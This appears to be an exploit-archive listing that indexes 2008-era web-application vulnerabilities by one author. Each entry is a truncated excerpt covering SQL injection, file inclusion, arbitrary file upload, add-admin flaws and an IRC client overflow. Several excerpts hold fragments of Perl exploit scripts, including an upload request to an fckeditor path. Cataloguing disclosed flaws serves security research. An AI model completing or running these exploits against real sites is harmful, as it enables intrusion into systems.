GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability

No description provided by source. --==+================================================================================+==-- --==+ GNU/Gallery = 1.1.1.0 admin.php Local File Inclusion Vulnerability +==-- --==+================================================================================+==--...

xeCMS <= 1.0.0 RC2 Insecure Cookie Handling Vulnerability

No description provided by source. -+================================================================================+- -+ xeCMS = 1.0.0 RC2 Insecure Cookie Handling Vulnerability +- -+================================================================================+- Discovered By: t0pP8uZz...

2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability

No description provided by source. --==+================================================================================+==-- --==+ 2532|Gigs = 1.2.2 Arbitrary Remote Database Backup/Download +==-- --==+================================================================================+==-- Discover...

WebCards <= 1.3 - Remote SQL Injection Vulnerability

No description provided by source. -+================================================================================+- -+ WebCards = 1.3 Remote SQL Injection Vulnerability +- -+================================================================================+- Discovered By: t0pP8uZz Contact:...

GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print INTRO; +++++++++++++++++++++++++++++++++++++++++++++++++++++ + GeekLog = 1.5.0 Remote Arbitrary File Upload + + + + Discovered && Coded By: t0pP8uZz + + + + 0day?!?Most...

Dana IRC <= 1.3 - Remote Buffer Overflow PoC

No description provided by source. - Dana IRC = 1.3 Remote Buffer Overflow POC/Crash - Discovered On: 14 JUNE 2008 Discovered By: t0pP8uZz Download: diebestenbits.de - Info - Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k overwrites the EIP therefor crashes t...

PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl - PIGMy-SQL = 1.4.1 Blind SQL Injection Exploit - PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the.. ..vulnerable page only returns a picture we have to use a blind sql...

Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit

No description provided by source. !/usr/bin/perl use strict; use LWP::UserAgent; print -+- Pet Grooming Management System = 2.0 Arbitrary Add-Admin Exploit -+-\n; print -+- Discovered && Coded By: t0pP8uZz - Discovered On: 15 MAY 2008 -+-\n; print -+- Script Download:...

Web Calendar <= 4.1 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use strict; use LWP::Simple; print -+-- Web Calendar = 4.1 Blind SQL Injection Exploit --+-\n; print -+-- --+-\n; print -+-- Discovered && Coded By t0pP8uZz --+-\n; print -+-- Discovered On: 24 April 2008 --+-\n; print -+-- --+-\n; print -+-- Web...

AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin Vuln

No description provided by source. --==+================================================================================+==-- --==+ AlkalinePHP = 0.77.35 adduser.php Arbitrary Add-Admin +==-- --==+================================================================================+==-- Discovered By:...

PhShoutBox <= 1.5 (final) Insecure Cookie Handling Vulnerability

No description provided by source. --==+================================================================================+==-- --==+ PhShoutBox = 1.5 final Insecure Cookie Handling Arbitrary Authentication +==--...

Mambo Component SimpleBoard &lt;= 1.0.1 Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print INTRO; - SimpleBoard Mambo Component = 1.0.1 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discover...

7Shop &lt;= 1.1 Remote Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand1000 . ".php"; int.. yes i know PU! print INTRO; +++++++++++++++++++++++++++++++++++++++++++++++++++++ + 7Shop = 1.1 Remote Arbitrary File Upload + +...

7shop-upload.txt

!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand1000 . ".php"; int.. yes i know PU! print Spoofing + + Discovered && Coded By: t0pP8uZz + + + + Contact IRC: irc.rizon.net sectalk + + Vendor not notified! Later versions maybe vuln! + + + +...

GeekLog &lt;= 1.5.0 Remote Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print INTRO; +++++++++++++++++++++++++++++++++++++++++++++++++++++ + GeekLog = 1.5.0 Remote Arbitrary File Upload + + + + Discovered && Coded By: t0pP8uZz + + + + 0day?!?Most...

geeklog-upload.txt

!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print ; print "Enter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $re = $ua-requestPOST $url.'/fckeditor/editor/filemanager/upload/php/upload.php', ContentType =...

WebBoard 2.0 - Arbitrary SQL QuestionAnwser Delete

WebBoard 2.0 - Arbitrary SQL QuestionAnwser Delete -+================================================================================+- -+ WebBoard tags to a valid question/anwser number execute the url, and the question and anwsers will be deleted. you can also use SQL injection in replace of th...

lastminute-sql.txt

-+================================================================================+- -+ Last Minute Script = 4.0 Remote SQL Injection Vulnerability +- -+================================================================================+- Discovered By: t0pP8uZz Discovered On: 8 JULY 2008 Script...

Mole Group Real Estate Script 1.1 - SQL Injection

-+================================================================================+- -+ Real Estate Script = 1.1 Remote SQL Injection Vulnerability +- -+================================================================================+- Discovered By: t0pP8uZz Discovered On: 8 JULY 2008 Script...

Mole Group Last Minute Script <= 4.0 Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ======================================================================= Mole Group Last Minute Script = 4.0 Remote SQL Injection Vulnerability ======================================================================= Discovered By: t0pP8uZz...